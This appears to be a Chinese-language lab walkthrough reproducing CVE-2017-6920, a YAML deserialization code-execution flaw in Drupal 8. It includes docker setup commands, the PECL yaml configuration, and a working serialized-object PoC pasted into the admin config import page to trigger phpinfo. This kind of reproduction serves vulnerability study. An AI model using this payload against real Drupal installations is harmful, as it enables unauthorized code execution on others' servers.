(CVE-2017-6920)Drupal_Core_8_PECL_YAML_反序列化任意代码执行漏洞

# (CVE-2017-6920)Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞

=========================

一、漏洞简介
————

Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal7.56之前的7.x版本和8.3.4之前的8.x版本中存在远程代码执行漏洞。远程攻击者可利用该漏洞在受影响应用程序上下文中执行任意代码或造成拒绝服务。

二、漏洞影响
————

Drupal Drupal 8.3.3 Drupal Drupal 8.3.2 Drupal Drupal 8.3.1 Drupal
Drupal 8.2.8 Drupal Drupal 8.2.7 Drupal Drupal 8.2.3 Drupal Drupal 8.2.2

三、复现过程
————

### 漏洞环境

执行如下命令启动 drupal 8.3.0 的环境:

docker-compose up -d

环境启动后,访问 `http://your-ip:8080/`
将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。

### 漏洞复现

– 先安装 `yaml` 扩展

“`{=html}

“`
# 换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源
cat > sources.list << EOF deb http://mirrors.163.com/debian/ jessie main non-free contrib deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib deb http://mirrors.163.com/debian/ jessie-backports main non-free contrib deb-src http://mirrors.163.com/debian/ jessie main non-free contrib deb-src http://mirrors.163.com/debian/ jessie-updates main non-free contrib deb-src http://mirrors.163.com/debian/ jessie-backports main non-free contrib deb http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib deb-src http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib EOF # 安装依赖 apt update apt-get -y install gcc make autoconf libc-dev pkg-config apt-get -y install libyaml-dev # 安装yaml扩展 pecl install yaml docker-php-ext-enable yaml.so # 启用 yaml.decode_php 否则无法复现成功 echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini
# 退出容器
exit
# 重启容器,CONTAINER换成自己的容器ID
docker restart CONTAINER

– 1.登录一个管理员账号

– 2.访问
`http://127.0.0.1:8080/admin/config/development/configuration/single/import`

– 3.如下图所示,`Configuration type` 选择
`Simple configuration`,`Configuration name`
任意填写,`Paste your configuration here` 中填写PoC如下:

“`{=html}

“`
!php/object “O:24:\”GuzzleHttp\\Psr7\\FnStream\”:2:{s:33:\”\0GuzzleHttp\\Psr7\\FnStream\0methods\”;a:1:{s:5:\”close\”;s:7:\”phpinfo\”;}s:9:\”_fn_close\”;s:7:\”phpinfo\”;}”

![](/static/qingy/(CVE-2017-6920)Drupal_Core_8_PECL_YAML_反序列化任意代码执行漏洞/img/rId26.png)

– 4.点击 `Import` 后可以看到漏洞触发成功,弹出 `phpinfo` 页面

![](/static/qingy/(CVE-2017-6920)Drupal_Core_8_PECL_YAML_反序列化任意代码执行漏洞/img/rId27.png)

– Tips:

– 虽然官方 CPE 信息显示从 `8.0.0` 开始就有该漏洞,但是在
`drupal:8.0.0` 容器内并没有复现成功,相同操作在 `drupal:8.3.0`
则可以复现成功,故基础镜像选择`drupal:8.3.0`

参考链接
——–

> https://vulhub.org/\#/environments/drupal/CVE-2017-6920/

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容